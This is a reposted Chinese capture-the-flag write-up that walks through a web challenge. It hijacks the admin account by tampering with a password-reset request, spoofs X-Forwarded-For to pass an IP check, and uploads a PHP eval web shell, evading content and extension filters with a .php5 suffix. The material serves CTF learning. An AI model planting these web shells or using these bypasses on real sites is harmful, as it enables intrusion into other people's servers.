码迷,mamicode.com
首页 > 其他好文 > 详细

bug

时间:2020-06-04 20:09:34      阅读:94      评论:0      收藏:0      [点我收藏+]

标签:lag   没有   需要   class   解析   后缀   forward   绕过   接下来   

0x01

进入页面,发现有登陆界面,有注册,有找回密码。我们先试试,所以这里我们先注册一个用户

技术图片

技术图片

注册成功,那么我们登陆看看有没有什么值得关注的地方

技术图片

看我箭头标的地方,第一个提示我们的用户是123,然后还有其他的几个功能,这几个其他的功能都可以进,唯独第二个Manage无法进去,提示信息如下

技术图片

所以,我们不是admin用户,那么如何登陆admin用户呢?首先注册肯定不行,因为账号已存在,那么我们怎么搞到admin的密码呢?还有一个功能我们忽略了,那就是找回密码,我们进去看看

技术图片

技术图片

技术图片

到这里,思路就是我们进行抓包,在数据上传的时候,我们将admin密码改成123456,这样我们就可以用123登陆admin用户了

技术图片

技术图片

提示修改成功

0x02

登陆admin用户

技术图片

成功登陆admin用户,我们看看第二个功能Manage

技术图片

提示我们ip不正确,所以猜测可能是ip检测,所以我们绕过它

x-Forwarded-For: 127.0.0.1

成功进去

技术图片

没有什么有用的信息,我们查看源码

技术图片

箭头处提示我们有这个功能,通过分析应该是文件上传,所以do后面应该是upload,我们尝试一下

技术图片

果然进去,那么接下来就是上传操作了,猜测应该是我们上传成功的话就会回显flag

0x03

先随便上传一个,看看有没有什么提示

技术图片

提示我们不是图片,所以我们得上传一个图片才行,图片内容我们写

<?php @eval($_POST[‘123‘]);?>

技术图片

上传后提示这个信息,说明检测到了里面是php,所以估计检测的是我们的内容,所以我们需要修改内容,将内容修改为

<script language="php">@eval($_POST[‘123‘]);</script>

重新上传后提示以下信息

技术图片

所以,我们现在需要截包,先用jpg绕过本地检测,然后将文件后缀改为php使服务器将其解析为php

技术图片

结果它仍然检测到我们是php,所以肯定是检测了后缀,经过尝试,php5可以进行绕过,所以将后缀改为php5,得到flag

技术图片

bug

标签:lag   没有   需要   class   解析   后缀   forward   绕过   接下来   

原文地址:https://www.cnblogs.com/Jleixin/p/13045486.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!